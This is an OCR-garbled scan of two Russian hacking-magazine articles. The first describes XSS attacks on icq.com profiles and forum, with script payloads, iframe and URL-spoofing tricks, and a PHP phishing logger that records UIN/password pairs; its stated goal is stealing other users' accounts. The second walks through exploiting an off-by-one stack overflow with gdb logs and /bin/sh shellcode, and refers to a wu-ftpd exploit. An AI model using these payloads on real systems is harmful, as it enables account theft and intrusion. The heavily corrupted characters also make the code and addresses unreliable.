шего уина 559822 находится по адресу: уѵѵѵуѵ.ісд.сот/уѵІпііерадез/уѵуѵрріір?іо-559822. Ко- 
паясь в клиенте, меня осенило: а что если осуществить межсайтовый скриптинг на этой 
странице? Вопрос: «Как?» Ответ: «Очень просто». В настройках пользователя клиента 
вводим данные, они загружаются на сайт и отображаются (срабатывают) на странице 
профайла. В принципе, все легко, но оказалось, что есть всего два уязвимых параметра: 
«Имя» и «Фамилия». Поле «Ник» отбросим: он нам не интересен :). Но тут еще один об- 
лом: ограничение на количество вводимых символов. Поэтому для локального алерта, 
к примеру, пришлось прибегнуть к той штуке, которую ты видишь на скрине под номером 1 . 
То есть вбить в поле «Имя» первую часть элементарного скрипта, а завершающую часть 
разместить в поле «Фамилия». 

Казалось бы, что тут можно придумать с такими ограничениями. Но мне посчастли- 
вилось найти еще один уязвимый параметр, в котором количество вводимых симво- 
лов было равно 80 — это «Домашняя страница». Правда, с этим параметром будь 
осторожней: у меня так забанилось несколько уинов. Хотя вполне возможно, что это 
не бан, а просто цір сходит с ума. Точно не знаю, но уины ушли навсегда :(. 

Для чего это можно использовать? К примеру, можно уводить чужие уины, ну, или 
в крайнем случае, можно здорово поприкалываться. Скажем, можно разместить 
в собственном профайле скрипт редиректа на свой сайт и стебаться над удивлением 
людей, заходящих посмотреть профайл :). Вот так, как у меня, полюбуйся: 
\А/\А/\л/.ісд.сот/уѵШераде5/уѵуѵр.рІпр?іо^559822 

[дырки на форуме сайта іся.сот] В чем нам очень повезло, так это в том, что 
на ісц.сот практически все сервисы находятся в одном поддомене. Следовательно, 
шансы найти подходящую дыру и увести нужные кукисы заметно подрастают :). 
Продолжая свои исследования, я залез на форум. Авторизация проще некуда, что меня 
очень обрадовало. Для авторизации нужно ввести в поле «Логин» свой уин или прима- 
ри, в поле «Пароль» — свой пароль к уину (который, как ты понимаешь, очень часто под- 
ходит и к примари). Теперь осталось только найти С55 дырку в форуме. 

Скажу честно, я чуть со смеху не умер после первого теста на СЗЗ. Даже не ус- 
пел копнуть ЬЬ-тэги, как уязвимый параметр был найден. Им оказалось поле 
ЗиЬіесІ при ответе в теме. В режиме ргеѵіеѵѵ ничего не фильтровалось, что уже 
предвещало большие возможности. Проверив на себе действие составленного 
скриптового сплоита (пока локального): "><5СгірІ>аІеЦ(сІоситепТсоокіе)</5СгірІ>, 
на моем лице появилась улыбка. 

Таким образом, я убедился в том, что все проходит более-менее успешно. Но при 
окончательном посте сообщения, просмотрев соре страницы, я увидел, что фильтру- 
ется любое проявление слэшей и двойных кавычек: 



ІШе="&диоІ;хзсгір1: 

8гс=ІіІф://ту_8ІІе/1 .ізх/зсгірЬ"> | 

" >&диоІ;&дІ;&ІІ;8СгірІ 

8гс=ІіПр://ту_8ііе/1.і8&ді;&Іі;/8С...</а> 

Планы рушатся. Максимум, что тут можно сделать - 
вставить алерт, например: <ітд 5гс=іаѵазсгірІ:аІеП I 
('Ріпк_сооГ)>, но ничего более серьезного отсюда не 
выжать. Не помог обход фильтрации и разнообразная 
перекодировка слэша и кавычек. 

[новая маза] Тут я заметил одну штуку: если клик- 
нуть на название своего поста или просмотреть список I 
всех своих постов, можно словить вставленную СЗЗ. 
Меня такое не устраивало, тем более, что второй пара- 
метр в заголовке сообщения полностью фильтровался, 
и поэтому над своим ником я видел отображенный 
скрипт, по которому и стоило кликать :). 

Пришлось начать поиски других уязвимостей. Оставив в | 
покое «Ответ в тему с цитированием», я нажал кнопку «На- 
чать новую тему». Вот тут (в режиме ргеѵіеѵѵ) в поле I 
ЗиЬіесШиезІіоп не работал ни один скрипт, все жестко | 
фильтровалось. Немного отчаявшись, я все же запостил те- 
му. В списке всех тем (в разделе) я увидел, что мой скрипт I 
выдает себя с головой. Ну что ж, работают фильтры. 

Я автоматом кликнул на тему, началась загрузка, и, о чудо, I 
скрипт сработал! Никаких фильтров внутри темы не оказа- 
лось, и нужная активная СЗЗ была найдена. Конечно, очень | 
обламывало, что в списке тем моя сильно палилась, назва- 
нием которой выступал мой скриптовый сплоит. Но с этим, I 
к сожалению, ничего не поделать, ведь даже при переводе 
его в другую кодировку, чтоб хоть немного запутать пользо- 
вателей, скрипт в теме работать не хотел. 

Такая вот забавная фильтрация, и такие вот глупые ад- 
мины. Но, как ты понимаешь, красть кукисы смысла I 
нет, так как в чистом виде мы получаем только уин 
(примари) и ник, но не пароль, а вытягивать его, напри- 
мер, из сессии нереально, так как скорее всего ее 
идентификатор никак не связан с паролем. 

Можно было бы поэкспериментировать с подстановкой | 
чужих куков (это если вдруг к сессии не был привязан ай- 
пи настоящего пользователя), но меня даже на экспери- 
мент эта идея не вдохновила. Единственное, что я мог I 
получить, — это доступ в чужой личный кабинет (именно 
форумный) и возможность постить сообщения от друго- | 
го пользователя. Каким-либо образом узнать или сме- 
нить пароль/инфу через профайл было невозможным, I 
поэтому я пошел другим путем — путем прямой кражи 
паролей через фейк-страницы авторизации. 



СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ + С55 

Как видишь, скрипт, помещенный в форум, выдает себя с головой, что немно- 
го портит наши планы (но даже несмотря на это, мне везло, и уины сами шли 
ко мне в лапы :)). Но не опускай руки, ведь что мешает просто кинуть ссылку 
в форум и заставить пользователя пройтись по ней или отправить форумчани- 
ну сообщение с этой ссылкой. Но помни, что результат полностью зависит 
только от тебя, так как тут без хороших навыков социального инженеринга 
не обойтись. Можно также поместить вредоносные скрипты в свой профайл, 
а потом просто гулять по форуму и творить беспредел. Как минимум, 5 поль- 
зователей из 10 да заглянет к тебе в профайл, прежде чем уин забанят :). 



РІ.АЗН-СЗЗ АТАКА 

Иногда провести СЗЗ-атаку стандартными мето- 
дами невозможно. В таком случае тебе может 
помочь очень простой и интересный способ. 

Я говорю про флеш-атаку. Для этого тебе пот- 
ребуется создать во РІазИ-редакторе какую-то 
картинку и в параметр деІІІРІІ- вписать ссылку, 
к примеру, с редиректом на фейк через пассив- 
ную СЗЗ (См. скрин.). После, в поле ЗифсІ, 
надо прописать: <етЬеб згс=ІіКр://ту_5йе/1 .зѵѵЬ. I 
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Забыл сказать, что при посте сообще- 
ния, рядом со своей аватаркой, мы име- 
ем 2 ссылки, одна из которых ведет в 
профайл, указанный в самом начале 
статьи, а другая — в профайл, находя- 
щийся примерно по следующему адресу: 
уѵуѵуѵ .ісд.сот/уѵііііерадез/аЬоиі_те .ріір?иі 
п=559822. Само собой, этот профайл то- 
же дырявый :). 

[идея и дальнейшие исследова- 
ния] Идея моя выглядела так: в форум 
кидаем сообщение со скриптом, редирек- 
тящим пользователя попавшего под воз- 
действие этой СЗЗ на страницу с фейком, 
расположенным на моем сайте, который 
выглядит, как главная страница авториза- 
ции на форуме. Пользователь вводит 
свои данные и переходит опять на форум, 
тем временем все введенные им данные 
сохраняются у меня. Но одно дело ска- 
зать.... Ведь пользователь сразу спалит 
подделку, если в адресной строке браузе- 
ра будет написано что-то типа: Мір//рап- 
Іегка-ііоу ііаскег.МБ.ги/гагѵосІ.рІір. Тут 
можно было пойти 2-мя путями: или ис- 
пользовать для обмана игі зрооііпд, или 
найти еще одну пассивную уязвимость 
(желательно на странице авторизации на 
форум) и встроить в нее іігате, через ко- 
торый отображался бы мой фейк. 

Я сбегал в ночной магазин за двумя бу- 
тылочками пивка и принялся искать но- 
вые СЗЗ. Прошло 15 мин, и уже было вы- 
делено 3 пассивных уязвимости, одна из 
которых находилась именно в странице 
авторизации. Вот ее игі с уже встроен- 
ным опасным скриптом: 

\л/\л/\л/.ісд.сот/кагта/Іодіп_раде.рИр?сІе 
5Ыійр%ЗА%2Р%2Р\л/\л/\л/.ісд.сот%2РЬ 
оагсІз%2Р&зѵ=2&сз5=ЬоагсІз.С55"><іТга 
те%20згс=ІіПр://ту_5ііе/Іодіп.рІір%20 
йеідМ=1 00%%20\л/ісШі=1 00%%20зсгоІІ 
іпд=по%20ТгатеЬогсІег=0> 

Теперь, переведя особо палевные мо- 
менты в игі кодировку, получим: 

\л/\л/\л/.ісд.сот/кагта/Іодіп_раде.рИр?сІез 
Ыійр%ЗА%2Р%2Р\л/\л/\л/.ісд.сот%2РЬоа 
гс]5%2Р&5ѵ=2&053=ЬоагсІ5.С55%22%ЗЕ 
% 3 С і I г а т е % 2 5 2 0 з г с % 3 О И 1:1: р % 3 А % 2 Р % 
2Рту_зі1е%2РІодіп.р[ір%2520[іеід[і1%3 
01 00%25%2520\л/ісІФ%301 00%25 



Как видишь, я создал ифрейм, в кото- 
ром будет отображаться наш фейк, рас- 
положенный на моем сайте, но... на дан- 
ной странице {уѵмм. ісд.сот/ кагта 
/Іодіп _раде.ріір) оказалось целых 3 уяз- 
вимых параметра, а это означает, что 
мы будем видеть целых три 100% иф- 
рейма, отображающихся сверху вниз. 
Конечно, не все это заметят, но, не же- 
лая рисковать, пришлось взять другую 
уязвимость — в форумном поисковике: 

\л/\л/\л/.ісд.сот/ісд_ргеТегепсез/зід_рге- 

ѵіе\л/.рІір?5ід=<5сгірЬаІег1(сіоситепІсо 

окіе)</зсгірЬ 

Тут меня тоже ждала неудача — ограниче- 
ние на количество вводимых символов. 
В итоге, я остановился на 3 СЗЗ. Вот ее игі с 
уже оформленным іігате. Опять же, зашиф- 
ровав все лишнее и некрасивое, получим: 

\л/\л/\л/.ісд.сот/ісд_ргеТегепсез/зід_рге- 
ѵіе\л/.рІір?5ід=%ЗСі1гате+5гс%30[іНр% 
ЗА%2Р%2Рту_зі1е%2РІодіп.р[ір+[іеідІі 
1%301 00%25+\л/ШШ%301 00%25+зсгоІІ 
іпд=по+ТгатеЬогсІег=0%ЗЕ 

Все прошло успешно, скрипт лишь нем- 
ного палится в МІе страницы, но, в прин- 
ципе, все отлично. 

Для общего развития я решил рассмот- 
реть еще один вариант обмана — игі 
зрооііпд. Эта идея уже рассматривалась 
в журнале, а именно №3 2004, стр. 64, 
так что особых сложностей у тебя выз- 
вать не должна. Для осуществления 
подставы, надо чтоб у жертвы в браузе- 
ре сработал такой вот код: 

<зсгірЫоса1іоп.[іге1=ипе5саре( , [іир://\л/ 
\л/\л/.ісд.сотІІодіп.рІпр%01 @\л/\л/\л/.ту_зі 
Іе/Іодіп.рІір'^/зсгірЬ 

Браузером должен быть не обновленный 
осел. К сожалению, в первом адресе 
скрипта, нельзя использовать слэши, по- 
этому пришлось довольствоваться вер- 
тикальной чертой. Хотя, возможно, 
ты придумаешь что-нибудь покрасивее :). 

[а теперь о самом фейке] А тут нет 

ничего сложного. Просто сохраняем стра- 
ницу авторизации на винт и немного пра- 
вим, а именно — изменяем параметр 
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рис. 2: скрипт в уязвимом поле 
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асііоп, указывая вместо тѵѵѵ.ісд.сот/кагта/іодіп.ріір свой | 
файл сПеск.рНр. Сам же сПеск.рПр будет выглядеть так: 

[сИеск.рПр] 

<?рНр 

$1р=Іореп("Іоді.П1тГ, "а"); //открываем файл Іоді.НІтІ 
для дозаписи в конец файла 

ІѵѵгіІе($Ір, "$иіп_етаіІ : $ра53ѵѵогб<Ьг/>"); //дозаписываем 
связку уин (примари):пароль 
ТсІозе($Тр); //закрываем файл 
ІіеасІегС'ІосаІіоп^ир^/ісд.сот/ЬоагсІз/"); //редиректим 
на главную страницу форума 
?> 

Теперь зальем эти 2 файла, а также файл Іоді.ПІтІ, на I 
сайт с поддержкой рПр (в данном случае это мой сайт — 
ту_зіІе). Вот и все, фейк готов! Не забудь только выста- | 
вить правильный сПтосІ. 

[собираем все воедино] Так как уязвимый параметр I 
ЗиЬіесІ/Оиезйоп не принимал более 55 знаков, пришлось 
прибегнуть к одной хитрости. В форуме я создал тему с за- 
головком "хзсгірі згс= , Шр://ту_зіІе/1.із"х/зсгірЬ. Потом | 
создал файл 1 .із, в который поместил такую вот строку: 

Іоса1іопФге1=ипе5саре(Фир:/М\л/\л/.ісд.сотІІодіп.р[ір%0 | 
1 ©ѵѵѵѵѵѵ.ту.зііе/іодіп.рілр 1 ); 

или для работы с ифреймом: 

Іоса1іоп.ііге1='[іир:/М\л/\л/.ісд.сот/ісд_рге1егепсе5/5ід_рге I 
ѵіе\д/.рІір?5ід=%ЗСі1гате+5гс%30[іир%ЗА%2Р%2Рту_5і 
Іе%2РІодіп.рІір+ІіеідІіІ%301 00%25+ѵѵісШі%301 00%25+$ | 
сгоШпд^о+ТгатеЬогйег^/оЗР'; 

Размещенный на форуме сплоит грузил с моего сайта I 
скрипт 1 .із, который редиректил всех, кто находился на 
данной странице форума, на мой фейк. Пользователь- 
жертва, думал, что это глюк форума и заново автори- I 
зировался, тем самым, оставляя мне свои уины/прима- 
ри и пароли, и после попадал обратно на доску как ни | 
в чем не бывало. 

Вот и все. Теперь задача стоит над тем, как удержать ук- 
раденные уины у себя, но зная уин/примари и пароль, это I 
уже не проблема :). 

[самый дырявый сайт года :)] Пока писал статью, 
в закрытых и паблик разделах античата начался глобаль- 
ный поиск багов в ісд.сот, и уже сейчас там есть очень I 
интересные разработки (множество пассивных СЗЗ, дыр- 
ки, позволяющие угнать айсикьюшное мыло, и т.д.). 

В то же время, когда статья уже была дописана, мной бы- I 
ло найдено еще несколько СЗЗ на ісд.сот. Так что делай | 
выводы и продолжай исследования 0 



форма для постинга сообщений 
на ѵѵѵѵѵѵ.Ііпихзискз.огд 



мой фейк, отображенный через ифрейм 



рис.1: элементарный обход фильтра на количество 
| вводимых символов 



| рис.З: мои кукисы во всей своей красоте 



| мой фейк, использующий игі-зрооііпд 



ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 




которой перезаписывается один байт памяти. Эта, на первый взгляд, 
незначительная проблема может привести к полному захвату контро- 
ля над исполняемой программой. Чтобы не быть голословным, рас- 
смотрю конкретный пример. Предположим, что какой-то програм- 
мист написал следующий код (только не спрашивай меня, для чего 
он это сделал :)): 

[пример уязвимого кода] 

#іпсІис!е <5ІсІіо.[і> 
ѵоісі са14(сііаг *); 
іпі таіп(іпІ агдс, сіпаг **агдѵ) 

{ 

сИаг а[1 00] = 

5Ігпсру(а,агдѵ[1],99); 

са14(агдѵ[2]); 

} 

ѵоісі саІ4(сІіаг * зіг) 

{ 

сііаг Ь[4] = 

5ІгпсаІ(Ь,5Іг,4); 

} 

На первый взгляд, все нормально и никаких ошибок в коде нет. Одна- 
ко опытный человек сразу заметит: программист забыл о том, что 
функция зігпсаі всегда добавляет символ І\ІІЛ_І_ в конец, строки и, та- 
ким образом, при передаче этой функции строки из 4-х символов, ре- 
ально записано в память будет 5. То есть 4 байта строки + ЫІІШ. Этот 
символ ЫІІШ будет записан вне области памяти, выделенной для хра- 
нения строки Ь, и, соответственно, перезапишет находящиеся там дан- 
ные. Чтобы определить, что именно будет перезаписываться, необхо- 



Суровый байт- 
одиночка 



ЕСЛИ ТЫ СЛЕДИШЬ ЗА БАГТРАК-ЛЕНТАМИ, ТО НА- 
ВЕРНЯКА СТАЛКИВАЛСЯ С УПОМИНАНИЯМИ ОБ «ОД- 
НОБАЙТОВОМ ПЕРЕПОЛНЕНИИ БУФЕРА» В РАЗЛИЧ- 
НЫХ СЕТЕВЫХ СЕРВИСАХ. НА ПЕРВЫЙ ВЗГЛЯД МО- 
ЖЕТ ПОКАЗАТЬСЯ, ЧТО ЭТО ЧТО-ТО НЕСУЩЕСТВЕН- 
НОЕ: НУ ПОДУМАЕШЬ, УДАСТСЯ ПЕРЕЗАПИСАТЬ 
ОДИН БАЙТ ПАМЯТИ, ЕРУНДА КАКАЯ. ОДНАКО ИНТУ- 
ИТИВНОЕ ПРЕДПОЛОЖЕНИЕ, ЧТО НИЧЕГО ЦЕННОГО 
ИЗ ЭТОГО ИЗВЛЕЧЬ НЕВОЗМОЖНО, — НЕВЕРНОЕ. 
СЕЙЧАС Я РАССКАЖУ ТЕБЕ, КАКИМ ОБРАЗОМ ВОЗ- 
МОЖНО НАИБОЛЕЕ ЭФФЕКТИВНО ИСПОЛЬЗОВАТЬ 
ЭТУ ЛАЗЕЙКУ I шѵѵсж 



Однобайтовое переполнение 
буфера для взлома программ 
и сетевых демонов 

[начало] Прежде всего следует разобраться с тем, откуда возника- 
ет такая проблема. В некоторых строковых функциях завершающий 
символ всегда размещается в конце строки и, при недостаточном 
знании программистом особенностей таких функций, может приве- 
сти к размещению данного символа за пределами буфера, выделен- 
ного для хранения строки. В этом случае происходит ситуация, при 








димо разобраться с тем, что про- 
исходит при вызове функции. 

[что происходит?] При вызове 
са14 из таіп выполняется команда 
ассемблера саІІ, при этом в стек 
проталкивается адрес возврата, 
это значение будет адресом ко- 
манды, следующей за текущим 
еір. Далее за записью адреса воз- 
врата следует то, что называется 
прологом процедуры. На этом эта- 
пе в стек проталкивается текущее 
значение ЕВР, оно называется 
сохраненным указателем кадра и 
позднее применяется для восста- 
новления исходного состояния 
ЕВР при выходе из функции. Да- 
лее текущее значение Е5Р копи- 
руется в ЕВР и устанавливает но- 
вый кадр стека. Если дизассем- 
блировать приведенную выше 
программу, то будет видно, как 
это происходит: 




Скачать сплоит для ши-Прб 
можно здесь: шшш.зесигі- 
іу.ппоѵ. ги/ПІе 5/0x82- 
ши 262. с 




Несмотря на кажущуюся 
незначительность этой 
уязвимости, от нее по- 
страдали весьма уважае- 
мые проекты: тосІ_55І и 
ши-йрб. Как ты уже понял, 
даже перезаписав один 
байт в стеке, возможно 
захватить управление про- 
граммой. 




На нашем диске ты най- 
дешь отладчик дбЬ, уяз- 
вимую версию ши-Йрб для 
экспериментов, а также 
исходник сплоита для 
этого демона. Экспери- 
ментируй на своем ком- 
пьютере! 



0x08048513 <таіп+95>: саІІ 0x8048600 <саІ4>; 

вызов функции // пролог функции 
0x08048600 <са14+0>: ризЬ %еЬр; сохранение еЬр в стеке 

0x08048601 <саМ+1>: тоѵ %езр,%еЬр 



После этого в стеке отводится память для локальных переменных функ- 
ции, в нашей программе это будет строка Ь. Так как в функции са14 не 
выделяется место для каких-либо еще данных, то выделенное место в 
памяти для этой строки будет граничить с местом, где находится сохра- 
ненный адрес ЕВР и, соответственно, символ ШІ_І_, который вышел за 
границы памяти, выделенной для переменной Ь, будет перезаписывать 
один байт в этом адресе. 

[работаем в дсІЬ] Процесс перезаписи байта в отладчике: 

$ дсіЬ опе_ЬуІе_оѵег 

# ставим бряк на вызов функции зігпсаі 
(дсіЬ) Ь зігпсаі 

(дсіЬ) г СССССССССССССССССССССССССССССССССССССССССССССС- 

ссссссссссссссссссссссссссссссссссссссссссссссссссс- 

ССССССССССССССССССССССССССССССССССС АААА 
ВгеакроіМ 2, 0x28062845 іп зігпсаі () Ігот /ІіЬ/ІіЬс.зо.5 

# останавливаемся на вызове зігпсаі 





(дсіЬ) х/4 ОхЫМеЬОО 

ОхЫЫеЬОО: 0x00000282 0x00000000 0хЫЫеЬа8 0x08048518 

Здесь 0x08048518 — это адрес возврата функции, 0x00000000 — место, 
выделенное для хранения строки, 0хЫЫеЬа8 — ЕВР, сохраненный в стеке. 




(дбЬ) П 

0x08048611 іп саМ () 

(дбЬ) х/4 ОхЫЫеЬОО 

ОхЫЫеЬОО: 0x00000282 0x41414141 ОхЫЫеЬОО 0x08048518 

0x08048518 — адрес возврата из функции (пока он нам неинтересен), 
0x41414141 — наша строка, ОхЫЫеЬОО — а здесь отчетливо виден сим- 
вол ШІ_1_, который перезаписал часть адреса, сохраненного в стеке. 
Итак, один байт в сохраненном указателе кадра стека был благополуч- 
но нами перезаписан на 00. Теперь самое время разобраться, что про- 
исходит при выходе из функции. При выходе из функции происходит вы- 
полнение двух инструкций: 

0x08048622 <саМ+34>: Іеаѵе 

0x08048623 <саМ+35>: геі 

[инструкция Іеаѵе] Инструкция Іеаѵе эквивалентна последовательности: 

тоѵ %еЬр,%езр 
рор еЬр 

І_еаѵе копирует регистр еЬр в езр, после чего в регистр еЬр значение 
извлекается из стека. Таким образом, стек после вызова Іеаѵе дол- 
жен возвращаться в такое же состояние, как и до пролога функции. 
Так как в регистр ЕВР значение извлекается из вершины стека, то 
есть восстанавливается из сохраненного указателя кадра стека, ко- 
торый мы уже изменили путем перезаписи одного байта, то и значе- 
ние еЬр будет изменено по отношению к еЬр, который был при вхо- 



сообщение об однобайтовом переполнении в тосІ_53І 



[ХАКЕР 11 [83] 05 > ВЗЛОМ 065 ] 








[хакер 11 [83] 05 > ВЗЛОМ 066 ] 



де в функцию. Далее инструкция геі помещает значение с вершины 
стека в регистр еір и продолжает выполнение программы. В отлад- 
чике можно увидеть, как при выходе из функции саМ восстанавли- 
вается из стека значение еЬр: 

(дсіь) п 

0x08048518 іп таіп () 

(дйЬ) і г 

еЬр ОхММеЬОО ОхММеЬОО 

Итак, как видно, измененный нами адрес благополучно попадает в 
регистр еЬр. 

Таким образом, функция таіп с нашей легкой руки будет работать с из- 
мененным указателем. Далее наша многострадальная функция таіп 
также завершает свою работу и действует по такому же принципу, то 
есть Іеаѵе и геі. 

Но так как при возврате в функцию таіп мы уже изменили значение 
еЬр, то и работа со стеком в этой функции будет идти в соответствии с 



ПЕРЕПОЛНЕНИЕ В ѴѴІІ-РТРО 

Пару лет назад на свет появился занимательный эк- 
сплойт, использующий ошибку в ѵѵи-Крсі версий 2.5.0 <= 
2.6.2. Однобайтовое переполнение в функции ТЬ_геаІ- 
раФ() привело к тому, что локальный или удаленный 
взломщик мог без проблем получить рутовые права на 
машине с установленным бажным демоном. 

Злосчастное переполнение возникало, когда длина пу- 
ти, к которому осуществляется обращение, равнялась 
МАХРАТН1_ЕЫ+1 символам. Переполнение отведенного 
буфера позволяло перезаписать информацию в стеке. 
Уязвимость — результат некорректного использования 
переменой гооФ при вычислении длины конкатениро- 
ванной строки: 

/* 

* Зоіп Фе Фю зФіпдз ФдеФег, епзигіпд Фаі Фе гідііі Фіпд 

* Ьаррепз і! Фе Іазі сотропепі із етріу, ог Фе Штате із гооі 

7 

іі (гезоІѵефО] == У && гезоіѵефі] == '\0') 
гооФ = 1 ; 
еізе 

гооФ = 0; 
іі (*\л/ЬиТ) { 

і! (зФІеп(гезоІѵесІ) + зІгІеп(\л/Ьи!) + гооФ + 1 > МАХРАТНІ_ЕІ\І) { 
еггпо = ЕІШ/ІЕТООШІМѲ; 
доФ еггі ; 

} 

і! (гооФ == 0) 

(ѵоШ) зФсаІ(гезоІѵесі, У"); 

(ѵоіф зФсаІ(гезоІѵесІ, \л/ЬиТ); 

} 

В результате, при помощи любой РТР-команды воз- 
можно переполнить буфер и перехватить управление 
программой. На некоторых системах использовать этот 
баг невозможно. Такой 
облом возникает в случае, 
когда размер отведенного 
под строку буфера, боль- 
ше, чем МАХРАТНІ_ЕІ\І. 

Это верно для ѵѵи-Крсі, со- 
бранных на версиях ли- 
нуксового ядра, в которых 
длина РАТН_МАХ и МАХ- 
РАТНІ_ЕІ\] жестко зафик- 
сирована на 4095 байтах 
— например, 2.2.x и ран- 
ние 2.4.x. Поэтому исполь- 
зовать сплоит для этой 
дыры можно только про- 
тив КрсІ-демонов, собран- 
ных на 2.0.x или более 
поздних 2.4.x 





использование нашего шелл-кода на практике 



измененным значением и данные из стека будут читаться не по тому ад- 
ресу, по которому предполагалось. 

Смотрим, что находится по адресу, в котором мы изменили регистр еЬр: 

(дсіЬ) х/4 ОхЫЫеЬОО 

ОхЫЫеЬОО: 0x00000282 0x41414141 ОхЬФФЬОО 0x08048518 

Значит, при выходе функция прочитает 0x00000282 в еЬр при выполне- 
нии Іеаѵе. После чего прочитает 0x41414141 в еір при выполнении геі и 
потом попытается прыгнуть на 0x41414141. Проверим это: 

(дсіЬ) ПІ 

0х080485Тс іп таіп () 

(дсіЬ) і г 

еЬр 0x282 0x282 

0x282 — первая часть марлезонского балета, еЬр восстановлен из стека. 

Еір 0x804851с 0х80485Ф 

(дсіЬ) пі 

Ргодгат гесеіѵесі зідпаі 8І63Е6Ѵ, Зедтепіаііоп ІаиФ 
0x41414141 іп ?? () 

(дсіЬ) і г 

еЬр 0x282 0x282 

еір 0x41414141 0x41414141 

Видно, что еір перезаписан, соответственно, получаем зідзегѵ. Таким 
образом, имея возможность управлять данными, которые располагают- 
ся по адресам, на которые будет указывать измененный еЬр, мы полу- 
чаем возможность управлять выполнением программы и, захватив 
власть над еір, можем творить все что душе угодно. 

[пишем шелл-код] Например, попробуем перенаправить выполнение 
программы по адресам, в которых у нас хранится первый переданный 
приложению аргумент. 

Так как переданные программе аргументы сохраняются в стеке, то, со- 
ответственно, от их длины будут зависеть адреса, по которым в даль- 
нейшем будет выделено место под хранение строк. Поэтому длина 
первого аргумента в данном случае рассчитывается таким образом, 
чтобы в дальнейшем адрес ЕВР с одним обнуленным байтом указал на 
адрес, за которым будет хранится строка Ь, что видно из вышеприве- 
денного лога отладчика. В нашем случае длина первого аргумента 
должна быть 132 символа. Также можно найти длину, при которой из- 
мененный еЬр будет указывать на место, где размещается строка «а» 
или еще что-то. В общем, все зависит от ситуации; в нашем случае 
длина 132 и еЬр указывает на строку «Ь». 

Далее, так как мы собираемся изменять еір на адрес, по которому рас- 
положена строка «Ь», следует учесть, что в строку копируется только 
первые 99 символов из первого аргумента программы. Таким образом, 
шелл-код нам придется располагать именно в первых 99 символах. 
Итак, приступим. Возьмем шелл-код под нашу систему (ІгееЬзсІ) и раз- 
местим его в первом аргументе программы: 

регі -е 1 
ргіпі "\х90"х70; 

ргіпі "\х31\хс0\х50\хЬ0\х1 7\х50\хссі\х80\х50\х68\х6е\х2!\х73\х68\х68\х2І 
\х2!\х62\х69\х89\хеЗ\х50\х54\х53\х50\хЬ0\хЗЬ\хссі\х80"; 
ргіпі "Н"хЗЗ; 
ргіпі " 

ргіпі "АААА"; 



[структура] Разберу структуру шелл-кода подробнее. Сначала идут 
70 нопов (99 символов минус 29 для шелл-кода). Затем следует сам 
шелл-код, после этого размещаются 33 символа для того, чтобы общая 
длина первого аргумента получилась равной 132 символам. Затем мы 






располагаем пробел и 4 символа «А», которые пока будут олицетворять 
собой адрес возврата. Теперь запускаем отладчик с таким аргументом 
к программе и смотрим, что из этого получилось: 



[отладка шелл-кода в дсІЬ] 



$ дсІЬ опе_Ьу!е_оѵег 

(дсІЬ) г 'регі -е 'ргіпі '\х90"х70; ргіпі "\х31\хс0\х50\хЬ0\х1 7\х50\хссІ\х80\х50 
\х68\х6е\х2І\х73\х68\х68\х2І\х2І\х62\х69\х89\хеЗ\х50\х54\х53\х50\хЬ0\х 
ЗЬ\хссІ\х80";ргіпІ "Н"хЗЗ; ргіпі " ргіпі "АААА"; 1 ' 

Ргодгат гесеіѵесі зідпаі ЗІ68Е6Ѵ, Зедтепіаііоп ІаиІІ. 

0x41414141 іп ?? () 

(дсІЬ) х/100 ОхЫЫеЬОО 



ОхЫЫеЬОО 

ОхЫЫеЫО 

0хЫЫеЬ20 

ОхЫЫеЬЗО 

0хЫЫеЬ40 

0хЫЫеЬ50 

ОхЫЫеЬбО 

0хЫЫеЬ70 

0хЫЫеЬ80 

ОхЫЫеЬЭО 

ОхЫЫеЬаО 

ОхЫЫеЬЬО 

ОхЫЫеЬсО 

ОхЫЫеЬЬО 

ОхЫЫеЬеО 

ОхЫЫеЫО: 

ОхЫЫесОО 

ОхЫЫесЮ 

0хЫЫес20 

ОхЫЫесЗО 

0хЫЫес40 

0хЫЫес50 

ОхЫЫесбО 

0хЫЫес70 

ОхЫЫесбО 



0x00000282 

ОхЫЫесШ 

0x08048358 

0x00000001 

0x90909090 

0x90909090 

0x90909090 

0x90909090 

0х685080ссІ 

0хЬ0505354 

0x28070000 

0х080484е9 

0х080484Ье 

0x00000000 

0хЫЫеЬе8 

0x00000003 

0x00000000 

ОхЫЫеЬсО 

ОхЫЫеЫЬ 

ОхЫЫееЬс 

0хЫЫеІ27 

0хЫЫеІ55 

0x00000003 

0x00000005 

0x00000008 



0x41414141 

ОхЫЫесІІ 

0х068асЮ4 

0x90909090 

0x90909090 

0x90909090 

0x90909090 

0x90909090 

0х68732Т6е 

0х0080сЬЗЬ 

0x00000001 

0x00000003 

0x0804864с 

0x00000000 

0x00000000 

ОхММессШ 

0хЫЫесі89 

0хЫЫесісІ2 

0хЫЫее27 

ОхЫЫеесб 

ОхЫЫеІЗО 

0хЫЫеІ62 

0x08048034 

0x00000006 

0x00000000 



ОхЫЫеЬОО 

0x00000063 

0x28070000 

0x90909090 

0x90909090 

0x90909090 

0x90909090 

ОхсОЗІ 9090 

0x62212168 

ОхЫЫеЬес 

0x0804864с 

0хЫЫеЫ4 

0хЫЫеЬе8 

0х2804Ь9ее 

0x00000000 

ОхЫЫесІІ 

ОхЫЫесШЬ 

ОхЫЫеЬЬс 

ОхЫЫееЗЬ 

ОхЫЫеееІ 

0хЫЫеІ38 

0хЫЫеІ84 

0x00000004 

0x00000006 

0x00000009 



0x08048518 

0х2804еІ23 

0хМЫеЬ48 

0x90909090 

0x90909090 

0x90909090 

0x90909090 

0x501 7Ь050 

0х50е38969 

0х2804Ьа09 

ОхЫЫеЬес 

0хЫЫес04 

0x00000000 

ОхЫЫеЫО 

0x00000000 

0хЫЫесІ84 

ОхЫЫесІаб 

0хЫЫесІе8 

ОхЫЫееаб 

ОхЫЫеІІ 5 

0хЫЫеІ48 

0x00000000 

0x00000020 

0x00001000 

0x08048464 





Поддерживает двуядерные процессоры Іпіеі 
с архитектурой 64-бит. 

Использует технологию 'ЮТ5 соппесГ, 
обеспечивающую 7.1 -канальное аудио. 

Встроенная сетевая карта 10/100/1000 
с интерфейсом РСІ-Е. 

Реализует технологию Динамического 
Оверклокинга 3-го поколения ЭОТЗ. 



Таким образом, мы можем использовать адреса 0хЫЫеЬ34 — 0хЫЫеЬ74 
в качестве адреса возврата. Проверим этот наш вывод на практике. 



91 5Р Ыео2-Г 



$ зиЬо сЬоѵѵп гооі опе_Ьу!е_оѵег 
